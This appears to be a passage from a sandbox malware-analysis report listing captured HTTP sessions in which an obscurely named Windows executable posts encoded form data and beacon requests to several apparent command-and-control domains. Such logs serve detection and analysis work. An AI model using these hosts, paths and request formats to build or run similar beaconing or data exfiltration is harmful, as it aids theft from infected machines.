                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US
                                                  Host: www.threendresses.com
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                  Jul 2, 2024 14:07:23.581276894 CEST | 1236 | IN | HTTP/1.1 301 Moved Permanently
                                                  Connection: close
                                                  content-type: text/html
                                                  content-length: 795
                                                  date: Tue, 02 Jul 2024 12:07:22 GMT
                                                  location: https://www.threendresses.com/ecb1/?wd98XJp=i1LTV2o1IZtmrbvE4asAhp8fTTMl8iuKZlDswLcPFQRrGDQpSYT4T6Qz9Nxrj1c/x943R5zeBwNAiK6gnAeQLZ/WlxRJaqzCSDsHaoXTEmVBFAAd8oj/2Yo=&2hZdq=H6f4R
                                                  x-xss-protection: 1; mode=block
                                                  x-frame-options: SAMEORIGIN
                                                  x-content-type-options: nosniff
                                                  referrer-policy: same-origin
                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body>
                                                  Jul 2, 2024 14:07:23.581300020 CEST | 8 | IN | Data Raw: 3c 2f 68 74 6d 6c 3e 0a
                                                  Data Ascii: </html>


                                                  Session ID: 9 | Source IP: 192.168.2.4 | Source Port: 49746 | Destination IP: 172.67.200.242 | Destination Port: 80 | PID: 1364
                                                  Process: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jul 2, 2024 14:07:28.626580954 CEST | 795 | OUT | POST /2nu3/ HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US
                                                  Accept-Encoding: gzip, deflate, br
                                                  Host: www.personalcaresale.shop
                                                  Origin: http://www.personalcaresale.shop
                                                  Referer: http://www.personalcaresale.shop/2nu3/
                                                  Connection: close
                                                  Content-Length: 204
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: max-age=0
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                  Data Ascii: wd98XJp=prq/Jx1u4rliMzEX68WouLsi0DXp4i5QHzXIRZKaB4JF5tKfovGZsxRwXm1+AGulwif7HcNSB8AclB/IPqL/F8VZhDKZwYxaotC4FByCW0RKWBQV/OlKg7jWowzrWdpdBYoU15KfSl7jRIq3RIg4Q3BrrU73+me1sCuESd/ZJBiSVKHJKhL7OnZV4VXsa7GnIQ==
                                                  Jul 2, 2024 14:07:29.294024944 CEST | 698 | IN | HTTP/1.1 404 Not Found
                                                  Date: Tue, 02 Jul 2024 12:07:29 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  X-Powered-By: PHP/7.4.33
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wgQ6PgazQjAPUs2hqKekXcmDvbNnJlO6Id6UqY8pMnUc5myRrVKxyyC6sEnavsTGfhPch7olsMUBk%2FINfw1pTT0XMj0eLzMq%2FEQ1mWIh1dMeSJsQtHuYNcapZGo41JkSk9SPkanK1AfcS1ZH"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 89ce840689ae4205-EWR
                                                  Content-Encoding: gzip
                                                  alt-svc: h3=":443"; ma=86400
                                                  Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 190


                                                  Session ID: 10 | Source IP: 192.168.2.4 | Source Port: 49747 | Destination IP: 172.67.200.242 | Destination Port: 80 | PID: 1364
                                                  Process: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jul 2, 2024 14:07:31.173074961 CEST | 815 | OUT | POST /2nu3/ HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US
                                                  Accept-Encoding: gzip, deflate, br
                                                  Host: www.personalcaresale.shop
                                                  Origin: http://www.personalcaresale.shop
                                                  Referer: http://www.personalcaresale.shop/2nu3/
                                                  Connection: close
                                                  Content-Length: 224
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: max-age=0
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                  Data Ascii: wd98XJp=prq/Jx1u4rliMQcX8sqorrst7jXp2C4ZHzbIRYOKCNRF6N6frqyZtxRwfG17EGuqwibdHddSB88clE7IOZj8D8Vb5zKX+4xaotC4FBmkW0ZKWxgV+sNJpbjVvwzrAtpZBYpx14WlSnzjRMi3RZg3JnBt2k7hxG3c0wrIYaX1QT2KdsWTbQqscn9mlSeYX47uTRB4823dar/mxLbHJMZu6Mo=
                                                  Jul 2, 2024 14:07:31.817847013 CEST | 704 | IN | HTTP/1.1 404 Not Found
                                                  Date: Tue, 02 Jul 2024 12:07:31 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  X-Powered-By: PHP/7.4.33
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=debBEllbuh7hmv%2Fkp%2BYCMaDVvz7Mwcgdti%2BENkmS3GcqLtw7019zPl2UQ01E4vOlOObWvNj3kSAR6GEaZofestAG3IESC%2FT6GeY7Qh4Za1tpYi6qNlfsLT2ESZMeXgyVGF%2Bp9pyA39JOMZfP"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 89ce84167bac1821-EWR
                                                  Content-Encoding: gzip
                                                  alt-svc: h3=":443"; ma=86400
                                                  Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 190


                                                  Session ID: 11 | Source IP: 192.168.2.4 | Source Port: 49748 | Destination IP: 172.67.200.242 | Destination Port: 80 | PID: 1364
                                                  Process: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jul 2, 2024 14:07:33.704408884 CEST | 10897 | OUT | POST /2nu3/ HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US
                                                  Accept-Encoding: gzip, deflate, br
                                                  Host: www.personalcaresale.shop
                                                  Origin: http://www.personalcaresale.shop
                                                  Referer: http://www.personalcaresale.shop/2nu3/
                                                  Connection: close
                                                  Content-Length: 10304
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: max-age=0
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                  Data Ascii: wd98XJp= [TRUNCATED]
                                                  Jul 2, 2024 14:07:34.369199038 CEST | 710 | IN | HTTP/1.1 404 Not Found
                                                  Date: Tue, 02 Jul 2024 12:07:34 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  X-Powered-By: PHP/7.4.33
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B9BYAb5vbW1K6nC6RV4oLXf16PUUuQXZfWNp%2BuEyOlPEOdo89STy8vh%2BorYzM27u9U6trgm3Lgfprxg28XYGrqoPf%2FzuEYHkFsB2d0a%2F%2BjzSxuN%2F9yZb1ZAI9Ro6Qn%2BgqjVO7ci51e2g4QgV"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 89ce84263eea8cd4-EWR
                                                  Content-Encoding: gzip
                                                  alt-svc: h3=":443"; ma=86400
                                                  Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 190


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  12 | 192.168.2.4 | 49749 | 172.67.200.242 | 80 | 1364 | C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jul 2, 2024 14:07:36.301714897 CEST | 508 | OUT | GET /2nu3/?wd98XJp=kpCfKF0WzJdSazQmt+Slz7YMxCL88Ck3GTDuMNK/H/Z7+vSkhcWJrxIVRHFhCg6b5G6dYsxeFoEulnLMEOj8SMB4wRe40fAIutKuKCnjbT5TVzUJ6OZr4Zg=&2hZdq=H6f4R HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US
                                                  Host: www.personalcaresale.shop
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                  Jul 2, 2024 14:07:36.996526003 CEST | 649 | IN | HTTP/1.1 404 Not Found
                                                  Date: Tue, 02 Jul 2024 12:07:36 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  X-Powered-By: PHP/7.4.33
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u4pVlZTadzumTYubhaf45%2BwB%2FNrUygRG3bkw8VZLNM3tXwK%2BTlA00iq3qIhkI%2BUzQdD4cEG2XkKKVD4bt%2FeKFQGjGJvRZE9CqgCFT8qCPVgv80ZuozuWyEjN7wwfT21MMtJbYKKQ6u0n2Fnz"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 89ce843659f5437b-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  Data Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  13 | 192.168.2.4 | 49750 | 188.114.97.3 | 80 | 1364 | C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jul 2, 2024 14:07:42.060544014 CEST | 765 | OUT | POST /efdt/ HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US
                                                  Accept-Encoding: gzip, deflate, br
                                                  Host: www.coinwab.com
                                                  Origin: http://www.coinwab.com
                                                  Referer: http://www.coinwab.com/efdt/
                                                  Connection: close
                                                  Content-Length: 204
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: max-age=0
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                  Data Raw: 77 64 39 38 58 4a 70 3d 42 43 6a 48 46 5a 79 34 50 6b 39 72 66 66 38 35 72 31 50 62 74 75 4a 51 4b 51 4a 7a 6d 5a 45 73 44 52 63 30 55 55 45 79 68 2f 75 30 39 57 65 54 53 70 50 73 6b 73 30 5a 5a 6d 45 46 4a 47 58 4a 53 78 5a 69 46 32 56 37 64 6b 4e 31 32 59 61 73 41 49 61 52 77 42 36 48 31 35 7a 4c 44 58 63 51 5a 45 47 5a 34 41 47 48 36 4c 78 49 43 34 6b 47 39 4a 63 69 56 55 2f 66 4b 76 33 4c 38 6f 74 54 76 4e 7a 49 75 32 49 4b 57 42 46 4d 7a 4c 70 70 65 52 6e 45 33 4f 35 66 76 4a 32 34 30 36 5a 6d 6e 61 37 69 44 38 63 72 37 6e 67 31 44 32 5a 36 57 50 6d 34 75 65 4a 6f 2b 57 6c 48 54 6d 65 41 2b 67 3d 3d
                                                  Data Ascii: wd98XJp=BCjHFZy4Pk9rff85r1PbtuJQKQJzmZEsDRc0UUEyh/u09WeTSpPsks0ZZmEFJGXJSxZiF2V7dkN12YasAIaRwB6H15zLDXcQZEGZ4AGH6LxIC4kG9JciVU/fKv3L8otTvNzIu2IKWBFMzLppeRnE3O5fvJ2406Zmna7iD8cr7ng1D2Z6WPm4ueJo+WlHTmeA+g==
                                                  Jul 2, 2024 14:07:42.956278086 CEST | 901 | IN | HTTP/1.1 301 Moved Permanently
                                                  Date: Tue, 02 Jul 2024 12:07:42 GMT
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  location: https://coinwab.com/index.php/efdt/
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AdAGhg2fbb%2BK3H71Y3S%2BSatyzg1aGSwoc%2B51qkebXGZtN6by0lNfoi2AHr92sTLCb%2F7loIgDqeiGv7IQehhS%2FflAlCkCx%2B7llJo3uABiiN0oMBnawAFHmALBT84unj6FU8o%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 89ce845bfd3d7277-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  Data Raw: 66 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 69 6e 77 61 62 2e 63 6f 6d 2f 69 6e 64 65 78 2e 70 68 70 2f 65 66 64 74 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: f3<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://coinwab.com/index.php/efdt/">here</a>.</p></body></html>0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  14 | 192.168.2.4 | 49751 | 188.114.97.3 | 80 | 1364 | C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jul 2, 2024 14:07:44.596745014 CEST | 785 | OUT | POST /efdt/ HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US
                                                  Accept-Encoding: gzip, deflate, br
                                                  Host: www.coinwab.com
                                                  Origin: http://www.coinwab.com
                                                  Referer: http://www.coinwab.com/efdt/
                                                  Connection: close
                                                  Content-Length: 224
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: max-age=0
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                  Data Raw: 77 64 39 38 58 4a 70 3d 42 43 6a 48 46 5a 79 34 50 6b 39 72 66 2f 73 35 70 53 6a 62 72 4f 4a 54 55 67 4a 7a 2f 4a 45 6f 44 52 41 30 55 56 42 70 69 4a 65 30 36 30 47 54 52 6f 50 73 6c 73 30 5a 42 57 45 41 4e 47 58 53 53 78 55 43 46 30 78 37 64 6b 4a 31 32 59 71 73 44 37 69 57 79 52 36 46 35 5a 7a 4e 4f 33 63 51 5a 45 47 5a 34 41 43 70 36 4c 35 49 46 4a 55 47 38 73 38 68 4a 6b 2f 51 61 2f 33 4c 32 49 74 66 76 4e 7a 36 75 30 39 68 57 43 74 4d 7a 4a 42 70 65 6c 4c 46 38 4f 35 46 68 70 32 75 30 34 46 72 69 2f 53 63 63 38 4d 63 37 7a 6b 4c 50 51 49 67 48 2b 48 76 38 65 74 62 6a 52 73 7a 65 6c 6a 4a 6c 6c 4d 78 46 67 69 54 6f 4b 44 61 32 70 4b 54 41 64 76 78 72 73 30 3d
                                                  Data Ascii: wd98XJp=BCjHFZy4Pk9rf/s5pSjbrOJTUgJz/JEoDRA0UVBpiJe060GTRoPsls0ZBWEANGXSSxUCF0x7dkJ12YqsD7iWyR6F5ZzNO3cQZEGZ4ACp6L5IFJUG8s8hJk/Qa/3L2ItfvNz6u09hWCtMzJBpelLF8O5Fhp2u04Fri/Scc8Mc7zkLPQIgH+Hv8etbjRszeljJllMxFgiToKDa2pKTAdvxrs0=
                                                  Jul 2, 2024 14:07:45.270081043 CEST | 893 | IN | HTTP/1.1 301 Moved Permanently
                                                  Date: Tue, 02 Jul 2024 12:07:45 GMT
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  location: https://coinwab.com/index.php/efdt/
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rvgJoDDKsjJ55RgW48s1%2BYdwlwsz0eoAAcCLjBRJ4AYivFaqbmKkSfdBdrRWbLt6f8rPXw1u0SqskhKs6t3FhISdj7TO7iqFhZUpjhySMww8UpX1CxvJ%2B3h3kjx1VvuGF3Q%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 89ce846a6f398c77-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  Data Raw: 66 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 69 6e 77 61 62 2e 63 6f 6d 2f 69 6e 64 65 78 2e 70 68 70 2f 65 66 64 74 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: f3<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://coinwab.com/index.php/efdt/">here</a>.</p></body></html>0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  15 | 192.168.2.4 | 49752 | 188.114.97.3 | 80 | 1364 | C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jul 2, 2024 14:07:47.126827955 CEST | 10867 | OUT | POST /efdt/ HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US
                                                  Accept-Encoding: gzip, deflate, br
                                                  Host: www.coinwab.com
                                                  Origin: http://www.coinwab.com
                                                  Referer: http://www.coinwab.com/efdt/
                                                  Connection: close
                                                  Content-Length: 10304
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: max-age=0
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                  Data Raw: 77 64 39 38 58 4a 70 3d 42 43 6a 48 46 5a 79 34 50 6b 39 72 66 2f 73 35 70 53 6a 62 72 4f 4a 54 55 67 4a 7a 2f 4a 45 6f 44 52 41 30 55 56 42 70 69 4b 2b 30 36 48 4f 54 52 50 6a 73 30 63 30 5a 49 32 45 42 4e 47 57 43 53 78 38 64 46 30 4d 4f 64 6d 42 31 77 37 69 73 47 4b 69 57 37 52 36 46 78 35 7a 4d 44 58 63 5a 5a 41 71 64 34 44 71 70 36 4c 35 49 46 4b 38 47 34 35 63 68 61 30 2f 66 4b 76 32 45 38 6f 73 4b 76 4a 66 51 75 30 70 58 52 7a 4e 4d 79 70 52 70 4e 32 7a 46 31 4f 35 44 6d 70 33 74 30 34 49 72 69 37 4c 74 63 2f 52 4c 37 30 73 4c 63 6c 39 38 43 62 6e 2f 2b 34 42 6b 67 47 45 6f 65 6e 4c 77 71 57 55 35 42 67 2b 48 30 5a 44 77 79 35 62 2b 46 5a 53 31 2f 59 53 77 68 56 77 4b 69 6b 73 43 51 59 58 6a 77 68 2b 35 73 61 2b 65 48 54 42 32 49 6f 63 61 4a 35 64 55 59 66 5a 71 42 4a 69 78 76 70 33 2b 30 46 47 76 64 49 69 63 6b 58 38 36 7a 5a 37 7a 67 47 47 30 76 33 46 62 54 33 64 47 43 62 6f 56 61 6b 30 70 4e 75 4c 6e 4f 4a 67 6f 6c 36 6d 34 6a 5a 39 59 50 55 4d 63 4e 58 43 6c 44 74 38 57 6a 4e 68 74 2b 44 [TRUNCATED]
                                                  Data Ascii: wd98XJp= [TRUNCATED]
                                                  Jul 2, 2024 14:07:47.795835018 CEST | 895 | IN | HTTP/1.1 301 Moved Permanently
                                                  Date: Tue, 02 Jul 2024 12:07:47 GMT
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  location: https://coinwab.com/index.php/efdt/
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xurewf%2FhOTekxTY64UIBAE08SJkkBmQxNo09znmMletRL4Wb9BEEkXdbaKmKrKiDb6BA3DBwYkc6UGoZ8vlFsFK5nWuADcdJQWZcsJ7jQUduF35Y%2Bg3KSpgVmupaAjIIw%2Bo%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 89ce847a1a430cbc-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  Data Raw: 66 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 69 6e 77 61 62 2e 63 6f 6d 2f 69 6e 64 65 78 2e 70 68 70 2f 65 66 64 74 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: f3<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://coinwab.com/index.php/efdt/">here</a>.</p></body></html>0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  16 | 192.168.2.4 | 49753 | 188.114.97.3 | 80 | 1364 | C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jul 2, 2024 14:07:49.702878952 CEST | 498 | OUT | GET /efdt/?wd98XJp=MALnGsSsCxZXAJsklBHSyvV4Cwt+rIU5CjwRGjorv42b71G2YZGZ8sEfFWk4L2DJaggYN2F6bElJhaqiOt+r3C6w5v7JMVR/VQKh9hDc+/lVPZE+6qMMIlI=&2hZdq=H6f4R HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US
                                                  Host: www.coinwab.com
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                  Jul 2, 2024 14:07:50.340125084 CEST | 1184 | IN | HTTP/1.1 301 Moved Permanently
                                                  Date: Tue, 02 Jul 2024 12:07:50 GMT
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  location: https://coinwab.com/index.php/efdt/?wd98XJp=MALnGsSsCxZXAJsklBHSyvV4Cwt+rIU5CjwRGjorv42b71G2YZGZ8sEfFWk4L2DJaggYN2F6bElJhaqiOt+r3C6w5v7JMVR/VQKh9hDc+/lVPZE+6qMMIlI=&2hZdq=H6f4R
                                                  CF-Cache-Status: DYNAMIC
